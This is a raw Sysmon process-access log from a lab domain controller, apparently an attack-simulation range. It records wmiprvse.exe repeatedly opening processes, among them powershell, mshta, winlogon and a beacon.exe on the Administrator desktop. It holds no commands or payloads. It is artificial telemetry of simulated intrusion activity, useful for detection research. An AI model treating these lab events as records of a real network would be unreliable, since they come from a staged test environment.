22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696964Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696963Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.833{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696962Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696961Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696960Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696959Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696958Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696953Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696952Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696951Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:39.818{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001696950Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 